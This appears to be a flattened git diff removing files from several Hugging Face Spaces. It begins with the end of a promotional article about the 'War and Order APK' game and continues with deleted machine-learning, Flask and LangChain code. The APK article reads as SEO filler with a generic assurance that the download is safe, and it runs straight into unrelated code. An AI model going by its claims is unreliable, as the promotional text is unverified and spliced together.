Another important aspect of War and Order APK is to research new magic and technology for your empire. You can do this by tapping on the academy and selecting the type of research you want to conduct. There are four categories of research in War and Order APK: Development, Military, Defense, and Magic. Each category has several subcategories that contain various research topics. For example, Development research allows you to improve your production, storage, speed, etc., Military research allows you to unlock new units, buffs, weapons, etc., Defense research allows you to enhance your walls, towers, traps, etc., and Magic research allows you to learn new spells, runes, potions, etc. Researching new magic and technology can give you an edge over your enemies and allies in the game.

-

Join an alliance and cooperate with other players to conquer territories and castles

-

One of the most fun and exciting features of War and Order APK is to join an alliance and cooperate with other players. You can do this by tapping on the alliance button and choosing to join an existing alliance or create your own. Joining an alliance can give you many benefits, such as sharing resources, information, troops, gifts, etc. You can also chat with your alliance members, make friends or enemies, form strategies and plans, etc.

-

One of the main goals of an alliance is to conquer new territories and castles in the game world. You can do this by tapping on the map and selecting a target to attack. You can also scout, rally, reinforce, or support your allies or enemies in the map. Conquering new territories and castles can give you more resources, prestige, and power in the game. You can also defend your territories and castles from enemy attacks by building defenses and sending troops.

-

What are the Features of War and Order APK?

-

War and Order APK has many features that make it a fun and addictive game. Here are some of them:

-

Huge battles with fully animated graphics and sound effects

-

War and Order APK has huge battles that involve hundreds or thousands of players and units. You can see your soldiers fight in real time with fully animated graphics and sound effects. You can also zoom in or out to get a better view of the action. The game also has a realistic physics engine that simulates the movement, collision, and damage of the units.

-

Diverse units and races with different abilities and skills

-

War and Order APK has diverse units and races that have different abilities and skills. You can command orcs, elves, humans, mages, beasts, angels, etc. Each unit has a different cost, speed, attack, defense, range, and skill. You can also upgrade your units by researching new magic and technology. You can also equip your units with weapons and armor that you can craft or buy.

-

A dynamic world with monsters, events, and challenges

-

War and Order APK has a dynamic world that changes according to the actions of the players. You can encounter monsters, events, and challenges in the game world that can give you rewards or risks. For example, you can fight against dragons, giants, zombies, etc. that drop rare items or resources. You can also participate in events such as festivals, tournaments, sieges, etc. that offer rewards or rankings. You can also face challenges such as quests, missions, achievements, etc. that test your skills and strategy.

-

What are the Pros and Cons of War and Order APK?

-

Like any other game, War and Order APK has its pros and cons. Here are some of them:

-

Pros: Fun, addictive, and strategic gameplay; Free to play; Regular updates; Friendly community

-

War and Order APK has a fun, addictive, and strategic gameplay that can keep you entertained for hours. You can build your own empire, recruit and train your army, research new magic and technology, join an alliance, fight against other players, conquer new territories and castles, etc. The game is also free to play, although you can buy some in-game items with real money if you want to. The game also has regular updates that add new features, content, and improvements to the game. The game also has a friendly community that you can chat with, make friends or enemies, form alliances or rivalries, etc.

-

Cons: Requires internet connection; May consume battery and data; May have bugs or glitches

-

War and Order APK requires an internet connection to play, which means you cannot play it offline. The game may also consume a lot of battery and data on your device, especially if you play it for a long time or participate in large battles. The game may also have some bugs or glitches that may affect your gameplay or experience. For example, you may encounter crashes, freezes, lags, errors, etc.

-

Conclusion

-

War and Order APK is a strategy game for Android that lets you build your own fantasy empire in a 3D medieval world. You can command orcs, elves, mages, and other races to fight against enemies from all over the world. You can also join an alliance and cooperate with other players to conquer new lands and castles. The game has many features that make it fun and addictive, such as huge battles, diverse units, dynamic world, etc. The game also has some pros and cons that you should consider before playing it.

-

FAQs

-

Here are some frequently asked questions about War and Order APK:

-

Q: Is War and Order APK safe to download and install?

-

A: Yes, War and Order APK is safe to download and install as long as you get it from a trusted source. You can also scan the APK file with an antivirus software before installing it to ensure its safety.

-

Q: How can I get more resources in War and Order APK?

-

A: You can get more resources in War and Order APK by building and upgrading your farms, mines, workshops, etc. You can also collect resources from the map by attacking monsters, events, or other players. You can also trade resources with your alliance members or buy them with real money.

-

Q: How can I get more gems in War and Order APK?

-

A: Gems are the premium currency in War and Order APK that can be used to buy special items, speed up processes, etc. You can get more gems by completing quests, achievements, challenges, etc. You can also get gems as rewards from events, tournaments, sieges, etc. You can also get gems by participating in the daily lottery or watching ads. You can also buy gems with real money.

-

Q: How can I join or create an alliance in War and Order APK?

-

A: You can join or create an alliance in War and Order APK by tapping on the alliance button and choosing to join an existing alliance or create your own. To join an existing alliance, you need to apply for it and wait for the approval of the leader or the elders. To create your own alliance, you need to pay a certain amount of gold and choose a name, flag, and description for your alliance. You can also invite other players to join your alliance or accept their applications.

-

Q: How can I change my name, avatar, or flag in War and Order APK?

-

A: You can change your name, avatar, or flag in War and Order APK by tapping on your profile button and choosing to edit your information. You can change your name once for free and then you need to pay gems for each change. You can change your avatar by selecting from the default options or uploading your own image. You can change your flag by selecting from the default options or creating your own design.

-

Q: How can I contact the customer service or report a problem in War and Order APK?

-

A: You can contact the customer service or report a problem in War and Order APK by tapping on the settings button and choosing to contact us or report a problem. You can also send an email to warandorder@camel4u.com or visit their official website or Facebook page for more information and support.

- References: : https://war-and-order.en.softonic.com/android : https://apkcombo.com/war-and-order/com.camelgames.superking/ : https://www.warandorder.net/ : https://www.facebook.com/WarandOrder1/

197e85843d
-
-
\ No newline at end of file diff --git a/spaces/44ov41za8i/FreeVC/speaker_encoder/data_objects/speaker_batch.py b/spaces/44ov41za8i/FreeVC/speaker_encoder/data_objects/speaker_batch.py deleted file mode 100644 index 4485605e3ece5b491d1e7d0f223c543b6c91eb96..0000000000000000000000000000000000000000 --- a/spaces/44ov41za8i/FreeVC/speaker_encoder/data_objects/speaker_batch.py +++ /dev/null @@ -1,12 +0,0 @@ -import numpy as np -from typing import List -from speaker_encoder.data_objects.speaker import Speaker - -class SpeakerBatch: - def __init__(self, speakers: List[Speaker], utterances_per_speaker: int, n_frames: int): - self.speakers = speakers - self.partials = {s: s.random_partial(utterances_per_speaker, n_frames) for s in speakers} - - # Array of shape (n_speakers * n_utterances, n_frames, mel_n), e.g. for 3 speakers with - # 4 utterances each of 160 frames of 40 mel coefficients: (12, 160, 40) - self.data = np.array([frames for s in speakers for _, frames, _ in self.partials[s]]) diff --git a/spaces/52Hz/CMFNet_deblurring/main_test_CMFNet.py b/spaces/52Hz/CMFNet_deblurring/main_test_CMFNet.py deleted file mode 100644 index 4eb8ef0e52c306edbe58142fcf6f64bb93f615c5..0000000000000000000000000000000000000000 --- a/spaces/52Hz/CMFNet_deblurring/main_test_CMFNet.py +++ /dev/null @@ -1,88 +0,0 @@ -import argparse -import cv2 -import glob -import numpy as np -from collections import OrderedDict -from skimage import img_as_ubyte -import os -import torch -import requests -from PIL import Image -import torchvision.transforms.functional as TF -import torch.nn.functional as F -from natsort import natsorted -from model.CMFNet import CMFNet - -def main(): - parser = argparse.ArgumentParser(description='Demo Image Deblur') - parser.add_argument('--input_dir', default='test/', type=str, help='Input images') - parser.add_argument('--result_dir', default='results/', type=str, help='Directory for results') - parser.add_argument('--weights', - default='experiments/pretrained_models/deblur_GoPro_CMFNet.pth', type=str, - help='Path to weights') - - args = parser.parse_args() - - inp_dir = args.input_dir - out_dir = args.result_dir - - os.makedirs(out_dir, exist_ok=True) - - files = natsorted(glob.glob(os.path.join(inp_dir, '*'))) - - if len(files) == 0: - raise Exception(f"No files found at {inp_dir}") - - device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') - - # Load corresponding models architecture and weights - model = CMFNet() - model = model.to(device) - model.eval() - load_checkpoint(model, args.weights) - - - mul = 8 - for file_ in files: - img = Image.open(file_).convert('RGB') - input_ = TF.to_tensor(img).unsqueeze(0).to(device) - - # Pad the input if not_multiple_of 8 - h, w = input_.shape[2], input_.shape[3] - H, W = ((h + mul) // mul) * mul, ((w + mul) // mul) * mul - padh = H - h if h % mul != 0 else 0 - padw = W - w if w % mul != 0 else 0 - input_ = F.pad(input_, (0, padw, 0, padh), 'reflect') - - with torch.no_grad(): - restored = model(input_) - - restored = torch.clamp(restored, 0, 1) - restored = restored[:, :, :h, :w] - restored = restored.permute(0, 2, 3, 1).cpu().detach().numpy() - restored = img_as_ubyte(restored[0]) - - f = os.path.splitext(os.path.split(file_)[-1])[0] - save_img((os.path.join(out_dir, f + '.png')), restored) - - - -def save_img(filepath, img): - cv2.imwrite(filepath, cv2.cvtColor(img, cv2.COLOR_RGB2BGR)) - - -def load_checkpoint(model, weights): - checkpoint = torch.load(weights, map_location=torch.device('cpu')) - try: - model.load_state_dict(checkpoint["state_dict"]) - except: - state_dict = checkpoint["state_dict"] - new_state_dict = OrderedDict() - for k, v in state_dict.items(): - name = k[7:] # remove `module.` - new_state_dict[name] = v - model.load_state_dict(new_state_dict) - - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/spaces/AB-TW/team-ai/agents/tools/smart_domain/entity.py b/spaces/AB-TW/team-ai/agents/tools/smart_domain/entity.py deleted file mode 100644 index 6af9e009781e46eeb305ddf002773d1cbaa22024..0000000000000000000000000000000000000000 --- a/spaces/AB-TW/team-ai/agents/tools/smart_domain/entity.py +++ /dev/null @@ -1,115 +0,0 @@ -from langchain.prompts import PromptTemplate -from langchain.chains import LLMChain -from langchain.agents import tool -from agents.tools.smart_domain.common import getPrefix -from models import llm - -entity_architecture = """ -Entity: This component is use to represents business concepts and encapsulates business rules. -It may include 3 parts: -- id(identity of entity) -- description (properties package of entity represent the value of entity), -- associations (collection of associated entiy) ----example code: - @Getter - @AllArgsConstructor - public class Feature {{ - // id - private FeatureId id; - - // description - private FeatureDescription description; - - // associations - private FeatureConfigs configs; - - public record FeatureId(String featureKey) {{ - - }} - - @Builder - public record FeatureDescription(String name, - String description, - Boolean isEnable, - LocalDateTime updatedAt, - LocalDateTime createdAt))) {{ - - }} - - public Feature update(Feature newFeature) {{ - this.description = FeatureDescription.builder() - .name(newFeature.description.name()) - .description(newFeature.description.description()) - .isEnable(this.description.isEnable()) - .updatedAt(LocalDateTime.now()) - .createdAt(this.description.createdAt()); - - return this; - }} - - public interface FeatureConfigs() {{ - Flux findAll(); - Flux subCollection(long from, long to); - Mono findById(FeatureConfigId id); - }} - }} ----end of example code -""" - -entity_test_strategy = """ -For the Entity, we can write unit test to ensure that the business rules related to Merchandise are correctly encapsulated. ----example code - class FeatureTest {{ - @Test - void should_update_feature_description() {{ - // given - Feature feature = Feature.builder() - .id(new FeatureId("featureKey")) - .description(new FeatureDescription("name", "description", true, LocalDateTime.now(), LocalDateTime.now())) - .build(); - Feature newFeature = Feature.builder() - .id(new FeatureId("featureKey")) - .description(new FeatureDescription("newName", "newDescription", true, LocalDateTime.now(), LocalDateTime.now())) - .build(); - // when - feature.update(newFeature); - // then - assertThat(feature.description().name()).isEqualTo("newName"); - assertThat(feature.description().description()).isEqualTo("newDescription"); - }} - }} ----end of example code -""" - -entity_tech_stack = """ -Java17、reactor、lombok、Junit5、reactor test、Mockito -""" - -entity_task = """Your task is to generate the Enity of domain layer tests and product code.""" -ENTITY = getPrefix(entity_task, entity_tech_stack, entity_architecture, entity_test_strategy) + """ - -Use the following format: -request: the request that you need to fulfill - -Entity: -``` -the Entity code that you write to fulfill the request, follow TechStack and Architecture -``` - -Test: -``` -the test code that you write to fulfill the request, follow TechStack Architecture and TestStrategy -``` - -request: {input}""" - -ENTITY_PROMPT = PromptTemplate(input_variables=["input"], template=ENTITY,) - -entityChain = LLMChain(llm = llm(temperature=0.1), prompt=ENTITY_PROMPT) - - -@tool("Generate Entity Code", return_direct=True) -def entityCodeGenerator(input: str) -> str: - '''useful for when you need to generate entity code''' - response = entityChain.run(input) - return response \ No newline at end of file diff --git a/spaces/ADOPLE/AdopleAI-Website-DocumentQA/README.md b/spaces/ADOPLE/AdopleAI-Website-DocumentQA/README.md deleted file mode 100644 index 46f027e1c546f424409ae59c1488a9576de99146..0000000000000000000000000000000000000000 --- a/spaces/ADOPLE/AdopleAI-Website-DocumentQA/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: DocumentQA Website -emoji: 🏃 -colorFrom: red -colorTo: red -sdk: gradio -sdk_version: 3.35.2 -app_file: app.py -pinned: false -duplicated_from: ADOPLE/Adopleai-DocumentQA ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/AIFILMS/generate_human_motion/VQ-Trans/options/option_vq.py b/spaces/AIFILMS/generate_human_motion/VQ-Trans/options/option_vq.py deleted file mode 100644 index 08a53ff1270facc10ab44ec0647e673ed1336d0d..0000000000000000000000000000000000000000 --- a/spaces/AIFILMS/generate_human_motion/VQ-Trans/options/option_vq.py +++ /dev/null @@ -1,61 +0,0 @@ -import argparse - -def get_args_parser(): - parser = argparse.ArgumentParser(description='Optimal Transport AutoEncoder training for AIST', - add_help=True, - formatter_class=argparse.ArgumentDefaultsHelpFormatter) - - ## dataloader - parser.add_argument('--dataname', type=str, default='kit', help='dataset directory') - parser.add_argument('--batch-size', default=128, type=int, help='batch size') - parser.add_argument('--window-size', type=int, default=64, help='training motion length') - - ## optimization - parser.add_argument('--total-iter', default=200000, type=int, help='number of total iterations to run') - parser.add_argument('--warm-up-iter', default=1000, type=int, help='number of total iterations for warmup') - parser.add_argument('--lr', default=2e-4, type=float, help='max learning rate') - parser.add_argument('--lr-scheduler', default=[50000, 400000], nargs="+", type=int, help="learning rate schedule (iterations)") - parser.add_argument('--gamma', default=0.05, type=float, help="learning rate decay") - - parser.add_argument('--weight-decay', default=0.0, type=float, help='weight decay') - parser.add_argument("--commit", type=float, default=0.02, help="hyper-parameter for the commitment loss") - parser.add_argument('--loss-vel', type=float, default=0.1, help='hyper-parameter for the velocity loss') - parser.add_argument('--recons-loss', type=str, default='l2', help='reconstruction loss') - - ## vqvae arch - parser.add_argument("--code-dim", type=int, default=512, help="embedding dimension") - parser.add_argument("--nb-code", type=int, default=512, help="nb of embedding") - parser.add_argument("--mu", type=float, default=0.99, help="exponential moving average to update the codebook") - parser.add_argument("--down-t", type=int, default=2, help="downsampling rate") - parser.add_argument("--stride-t", type=int, default=2, help="stride size") - parser.add_argument("--width", type=int, default=512, help="width of the network") - parser.add_argument("--depth", type=int, default=3, help="depth of the network") - parser.add_argument("--dilation-growth-rate", type=int, default=3, help="dilation growth rate") - parser.add_argument("--output-emb-width", type=int, default=512, help="output embedding width") - parser.add_argument('--vq-act', type=str, default='relu', choices = ['relu', 'silu', 'gelu'], help='dataset directory') - parser.add_argument('--vq-norm', type=str, default=None, help='dataset directory') - - ## quantizer - parser.add_argument("--quantizer", type=str, default='ema_reset', choices = ['ema', 'orig', 'ema_reset', 'reset'], help="eps for optimal transport") - parser.add_argument('--beta', type=float, default=1.0, help='commitment loss in standard VQ') - - ## resume - parser.add_argument("--resume-pth", type=str, default=None, help='resume pth for VQ') - parser.add_argument("--resume-gpt", type=str, default=None, help='resume pth for GPT') - - - ## output directory - parser.add_argument('--out-dir', type=str, default='output_vqfinal/', help='output directory') - parser.add_argument('--results-dir', type=str, default='visual_results/', help='output directory') - parser.add_argument('--visual-name', type=str, default='baseline', help='output directory') - parser.add_argument('--exp-name', type=str, default='exp_debug', help='name of the experiment, will create a file inside out-dir') - ## other - parser.add_argument('--print-iter', default=200, type=int, help='print frequency') - parser.add_argument('--eval-iter', default=1000, type=int, help='evaluation frequency') - parser.add_argument('--seed', default=123, type=int, help='seed for initializing training.') - - parser.add_argument('--vis-gt', action='store_true', help='whether visualize GT motions') - parser.add_argument('--nb-vis', default=20, type=int, help='nb of visualizations') - - - return parser.parse_args() \ No newline at end of file diff --git a/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/ema.py b/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/ema.py deleted file mode 100644 index c8c75af43565f6e140287644aaaefa97dd6e67c5..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/ema.py +++ /dev/null @@ -1,76 +0,0 @@ -import torch -from torch import nn - - -class LitEma(nn.Module): - def __init__(self, model, decay=0.9999, use_num_upates=True): - super().__init__() - if decay < 0.0 or decay > 1.0: - raise ValueError('Decay must be between 0 and 1') - - self.m_name2s_name = {} - self.register_buffer('decay', torch.tensor(decay, dtype=torch.float32)) - self.register_buffer('num_updates', torch.tensor(0,dtype=torch.int) if use_num_upates - else torch.tensor(-1,dtype=torch.int)) - - for name, p in model.named_parameters(): - if p.requires_grad: - #remove as '.'-character is not allowed in buffers - s_name = name.replace('.','') - self.m_name2s_name.update({name:s_name}) - self.register_buffer(s_name,p.clone().detach().data) - - self.collected_params = [] - - def forward(self,model): - decay = self.decay - - if self.num_updates >= 0: - self.num_updates += 1 - decay = min(self.decay,(1 + self.num_updates) / (10 + self.num_updates)) - - one_minus_decay = 1.0 - decay - - with torch.no_grad(): - m_param = dict(model.named_parameters()) - shadow_params = dict(self.named_buffers()) - - for key in m_param: - if m_param[key].requires_grad: - sname = self.m_name2s_name[key] - shadow_params[sname] = shadow_params[sname].type_as(m_param[key]) - shadow_params[sname].sub_(one_minus_decay * (shadow_params[sname] - m_param[key])) - else: - assert not key in self.m_name2s_name - - def copy_to(self, model): - m_param = dict(model.named_parameters()) - shadow_params = dict(self.named_buffers()) - for key in m_param: - if m_param[key].requires_grad: - m_param[key].data.copy_(shadow_params[self.m_name2s_name[key]].data) - else: - assert not key in self.m_name2s_name - - def store(self, parameters): - """ - Save the current parameters for restoring later. - Args: - parameters: Iterable of `torch.nn.Parameter`; the parameters to be - temporarily stored. - """ - self.collected_params = [param.clone() for param in parameters] - - def restore(self, parameters): - """ - Restore the parameters stored with the `store` method. - Useful to validate the model with EMA parameters without affecting the - original optimization process. Store the parameters before the - `copy_to` method. After validation (or model saving), use this to - restore the former parameters. - Args: - parameters: Iterable of `torch.nn.Parameter`; the parameters to be - updated with the stored parameters. - """ - for c_param, param in zip(self.collected_params, parameters): - param.data.copy_(c_param.data) diff --git a/spaces/ASJMO/freegpt/server/website.py b/spaces/ASJMO/freegpt/server/website.py deleted file mode 100644 index 01b35dee1621b5b5bea49de330466ebb62817f20..0000000000000000000000000000000000000000 --- a/spaces/ASJMO/freegpt/server/website.py +++ /dev/null @@ -1,58 +0,0 @@ -from flask import render_template, redirect, url_for, request, session -from flask_babel import refresh -from time import time -from os import urandom -from server.babel import get_locale, get_languages - - -class Website: - def __init__(self, bp, url_prefix) -> None: - self.bp = bp - self.url_prefix = url_prefix - self.routes = { - '/': { - 'function': lambda: redirect(url_for('._index')), - 'methods': ['GET', 'POST'] - }, - '/chat/': { - 'function': self._index, - 'methods': ['GET', 'POST'] - }, - '/chat/': { - 'function': self._chat, - 'methods': ['GET', 'POST'] - }, - '/change-language': { - 'function': self.change_language, - 'methods': ['POST'] - }, - '/get-locale': { - 'function': self.get_locale, - 'methods': ['GET'] - }, - '/get-languages': { - 'function': self.get_languages, - 'methods': ['GET'] - } - } - - def _chat(self, conversation_id): - if '-' not in conversation_id: - return redirect(url_for('._index')) - - return render_template('index.html', chat_id=conversation_id, url_prefix=self.url_prefix) - - def _index(self): - return render_template('index.html', chat_id=f'{urandom(4).hex()}-{urandom(2).hex()}-{urandom(2).hex()}-{urandom(2).hex()}-{hex(int(time() * 1000))[2:]}', url_prefix=self.url_prefix) - - def change_language(self): - data = request.get_json() - session['language'] = data.get('language') - refresh() - return '', 204 - - def get_locale(self): - return get_locale() - - def get_languages(self): - return get_languages() diff --git a/spaces/AlexN/pull_up/README.md b/spaces/AlexN/pull_up/README.md deleted file mode 100644 index fd416cf9448817841aedd43602ead2c9fb679afc..0000000000000000000000000000000000000000 --- a/spaces/AlexN/pull_up/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: Pull_up -emoji: 💪 -colorFrom: pink -colorTo: yellow -sdk: gradio -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/AlhitawiMohammed22/HTD_HTR/builder.py b/spaces/AlhitawiMohammed22/HTD_HTR/builder.py deleted file mode 100644 index e4bebf35c90979c17c95eb1cfcebee9a75b63174..0000000000000000000000000000000000000000 --- a/spaces/AlhitawiMohammed22/HTD_HTR/builder.py +++ /dev/null @@ -1,305 +0,0 @@ - -# Copyright (C) 2021, Mindee. - -# This program is licensed under the Apache License version 2. -# See LICENSE or go to for full license details. - - -from typing import Any, Dict, List, Tuple -import pandas as pd - -import numpy as np -from scipy.cluster.hierarchy import fclusterdata - -from doctr.utils.geometry import estimate_page_angle, resolve_enclosing_bbox, resolve_enclosing_rbbox, rotate_boxes -from doctr.utils.repr import NestedObject - -__all__ = ['DocumentBuilder'] - - -class DocumentBuilder(NestedObject): - """Implements a document builder - Args: - resolve_lines: whether words should be automatically grouped into lines - resolve_blocks: whether lines should be automatically grouped into blocks - paragraph_break: relative length of the minimum space separating paragraphs - export_as_straight_boxes: if True, force straight boxes in the export (fit a rectangle - box to all rotated boxes). Else, keep the boxes format unchanged, no matter what it is. - """ - - def __init__( - self, - resolve_lines: bool = True, - resolve_blocks: bool = True, - paragraph_break: float = 0.035, - export_as_straight_boxes: bool = False, - ) -> None: - - self.resolve_lines = resolve_lines - self.resolve_blocks = resolve_blocks - self.paragraph_break = paragraph_break - self.export_as_straight_boxes = export_as_straight_boxes - - @staticmethod - def _sort_boxes(boxes: np.ndarray) -> np.ndarray: - """Sort bounding boxes from top to bottom, left to right - Args: - boxes: bounding boxes of shape (N, 4) or (N, 4, 2) (in case of rotated bbox) - Returns: - tuple: indices of ordered boxes of shape (N,), boxes - If straight boxes are passed tpo the function, boxes are unchanged - else: boxes returned are straight boxes fitted to the straightened rotated boxes - so that we fit the lines afterwards to the straigthened page - """ - if boxes.ndim == 3: - boxes = rotate_boxes( - loc_preds=boxes, - angle=-estimate_page_angle(boxes), - orig_shape=(1024, 1024), - min_angle=5., - ) - boxes = np.concatenate((boxes.min(1), boxes.max(1)), -1) - return (boxes[:, 0] + 2 * boxes[:, 3] / np.median(boxes[:, 3] - boxes[:, 1])).argsort(), boxes - - def _resolve_sub_lines(self, boxes: np.ndarray, word_idcs: List[int]) -> List[List[int]]: - """Split a line in sub_lines - Args: - boxes: bounding boxes of shape (N, 4) - word_idcs: list of indexes for the words of the line - Returns: - A list of (sub-)lines computed from the original line (words) - """ - lines = [] - # Sort words horizontally - word_idcs = [word_idcs[idx] - for idx in boxes[word_idcs, 0].argsort().tolist()] - - # Eventually split line horizontally - if len(word_idcs) < 2: - lines.append(word_idcs) - else: - sub_line = [word_idcs[0]] - for i in word_idcs[1:]: - horiz_break = True - - prev_box = boxes[sub_line[-1]] - # Compute distance between boxes - dist = boxes[i, 0] - prev_box[2] - # If distance between boxes is lower than paragraph break, same sub-line - if dist < self.paragraph_break: - horiz_break = False - - if horiz_break: - lines.append(sub_line) - sub_line = [] - - sub_line.append(i) - lines.append(sub_line) - - return lines - - def _resolve_lines(self, boxes: np.ndarray) -> List[List[int]]: - """Order boxes to group them in lines - Args: - boxes: bounding boxes of shape (N, 4) or (N, 4, 2) in case of rotated bbox - Returns: - nested list of box indices - """ - - # Sort boxes, and straighten the boxes if they are rotated - idxs, boxes = self._sort_boxes(boxes) - - # Compute median for boxes heights - y_med = np.median(boxes[:, 3] - boxes[:, 1]) - - lines = [] - words = [idxs[0]] # Assign the top-left word to the first line - # Define a mean y-center for the line - y_center_sum = boxes[idxs[0]][[1, 3]].mean() - - for idx in idxs[1:]: - vert_break = True - - # Compute y_dist - y_dist = abs(boxes[idx][[1, 3]].mean() - y_center_sum / len(words)) - # If y-center of the box is close enough to mean y-center of the line, same line - if y_dist < y_med / 2: - vert_break = False - - if vert_break: - # Compute sub-lines (horizontal split) - lines.extend(self._resolve_sub_lines(boxes, words)) - words = [] - y_center_sum = 0 - - words.append(idx) - y_center_sum += boxes[idx][[1, 3]].mean() - - # Use the remaining words to form the last(s) line(s) - if len(words) > 0: - # Compute sub-lines (horizontal split) - lines.extend(self._resolve_sub_lines(boxes, words)) - - return lines - - @staticmethod - def _resolve_blocks(boxes: np.ndarray, lines: List[List[int]]) -> List[List[List[int]]]: - """Order lines to group them in blocks - Args: - boxes: bounding boxes of shape (N, 4) or (N, 4, 2) - lines: list of lines, each line is a list of idx - Returns: - nested list of box indices - """ - # Resolve enclosing boxes of lines - if boxes.ndim == 3: - box_lines = np.asarray([ - resolve_enclosing_rbbox( - [tuple(boxes[idx, :, :]) for idx in line]) - for line in lines # type: ignore[misc] - ]) - else: - _box_lines = [ - resolve_enclosing_bbox([ - # type: ignore[misc] - (tuple(boxes[idx, :2]), tuple(boxes[idx, 2:])) for idx in line - ]) - for line in lines - ] - box_lines = np.asarray([(x1, y1, x2, y2) - for ((x1, y1), (x2, y2)) in _box_lines]) - - # Compute geometrical features of lines to clusterize - # Clusterizing only with box centers yield to poor results for complex documents - if boxes.ndim == 3: - box_features = np.stack( - ( - (box_lines[:, 0, 0] + box_lines[:, 0, 1]) / 2, - (box_lines[:, 0, 0] + box_lines[:, 2, 0]) / 2, - (box_lines[:, 0, 0] + box_lines[:, 2, 1]) / 2, - (box_lines[:, 0, 1] + box_lines[:, 2, 1]) / 2, - (box_lines[:, 0, 1] + box_lines[:, 2, 0]) / 2, - (box_lines[:, 2, 0] + box_lines[:, 2, 1]) / 2, - ), axis=-1 - ) - else: - box_features = np.stack( - ( - (box_lines[:, 0] + box_lines[:, 3]) / 2, - (box_lines[:, 1] + box_lines[:, 2]) / 2, - (box_lines[:, 0] + box_lines[:, 2]) / 2, - (box_lines[:, 1] + box_lines[:, 3]) / 2, - box_lines[:, 0], - box_lines[:, 1], - ), axis=-1 - ) - # Compute clusters - clusters = fclusterdata( - box_features, t=0.1, depth=4, criterion='distance', metric='euclidean') - - _blocks: Dict[int, List[int]] = {} - # Form clusters - for line_idx, cluster_idx in enumerate(clusters): - if cluster_idx in _blocks.keys(): - _blocks[cluster_idx].append(line_idx) - else: - _blocks[cluster_idx] = [line_idx] - - # Retrieve word-box level to return a fully nested structure - blocks = [[lines[idx] for idx in block] for block in _blocks.values()] - - return blocks - - def _build_blocks(self, boxes: np.ndarray, word_preds: List[Tuple[str, float]], page_shapes: List[Tuple[int, int]]) -> Any: - """Gather independent words in structured blocks - Args: - boxes: bounding boxes of all detected words of the page, of shape (N, 5) or (N, 4, 2) - word_preds: list of all detected words of the page, of shape N - Returns: - list of block elements - """ - - if boxes.shape[0] != len(word_preds): - raise ValueError( - f"Incompatible argument lengths: {boxes.shape[0]}, {len(word_preds)}") - - if boxes.shape[0] == 0: - return [] - - # Decide whether we try to form lines - _boxes = boxes - if self.resolve_lines: - lines = self._resolve_lines( - _boxes if _boxes.ndim == 3 else _boxes[:, :4]) - # Decide whether we try to form blocks - if self.resolve_blocks and len(lines) > 1: - _blocks = self._resolve_blocks( - _boxes if _boxes.ndim == 3 else _boxes[:, :4], lines) - else: - _blocks = [lines] - else: - # Sort bounding boxes, one line for all boxes, one block for the line - lines = [self._sort_boxes( - _boxes if _boxes.ndim == 3 else _boxes[:, :4])[0]] - _blocks = [lines] - - rows = [] - for block_idx, lines in enumerate(_blocks): - for line_idx, line in enumerate(lines): - for i,idx in enumerate(line): - h, w = page_shapes - row = ( - block_idx, line_idx, i, word_preds[idx], - int(round(boxes[idx, 0]*w) - ), int(round(boxes[idx, 1]*h)), - int(round(boxes[idx, 2]*w) - ), int(round(boxes[idx, 3]*h)), - int(round(boxes[idx, 4]*100)) - ) - rows.append(row) - - return rows - - def extra_repr(self) -> str: - return (f"resolve_lines={self.resolve_lines}, resolve_blocks={self.resolve_blocks}, " - f"paragraph_break={self.paragraph_break}, " - f"export_as_straight_boxes={self.export_as_straight_boxes}") - - def __call__( - self, - boxes: List[np.ndarray], - text_preds: List[List[Tuple[str, float]]], - page_shapes: List[Tuple[int, int]] - ) -> pd.DataFrame: - """Re-arrange detected words into structured blocks - Args: - boxes: list of N elements, where each element represents the localization predictions, of shape (*, 5) - or (*, 6) for all words for a given page - text_preds: list of N elements, where each element is the list of all word prediction (text + confidence) - page_shape: shape of each page, of size N - Returns: - document object - """ - if len(boxes) != len(text_preds) or len(boxes) != len(page_shapes): - raise ValueError( - "All arguments are expected to be lists of the same size") - - if self.export_as_straight_boxes and len(boxes) > 0: - # If boxes are already straight OK, else fit a bounding rect - if boxes[0].ndim == 3: - straight_boxes = [] - # Iterate over pages - for p_boxes in boxes: - # Iterate over boxes of the pages - straight_boxes.append(np.concatenate( - (p_boxes.min(1), p_boxes.max(1)), 1)) - boxes = straight_boxes - - _pages = [ - pd.DataFrame.from_records(self._build_blocks(page_boxes, word_preds, shape), columns=[ - "block_num", "line_num", "word_num" ,"word", "xmin", "ymin", "xmax", "ymax", "confidence_score" - ]) - for _idx, shape, page_boxes, word_preds in zip(range(len(boxes)), page_shapes, boxes, text_preds) - ] - - return _pages \ No newline at end of file diff --git a/spaces/Alpaca233/SadTalker/src/face3d/data/flist_dataset.py b/spaces/Alpaca233/SadTalker/src/face3d/data/flist_dataset.py deleted file mode 100644 index c0b6945c80aa756074a5d3c02b9443b15ddcfc57..0000000000000000000000000000000000000000 --- a/spaces/Alpaca233/SadTalker/src/face3d/data/flist_dataset.py +++ /dev/null @@ -1,125 +0,0 @@ -"""This script defines the custom dataset for Deep3DFaceRecon_pytorch -""" - -import os.path -from data.base_dataset import BaseDataset, get_transform, get_affine_mat, apply_img_affine, apply_lm_affine -from data.image_folder import make_dataset -from PIL import Image -import random -import util.util as util -import numpy as np -import json -import torch -from scipy.io import loadmat, savemat -import pickle -from util.preprocess import align_img, estimate_norm -from util.load_mats import load_lm3d - - -def default_flist_reader(flist): - """ - flist format: impath label\nimpath label\n ...(same 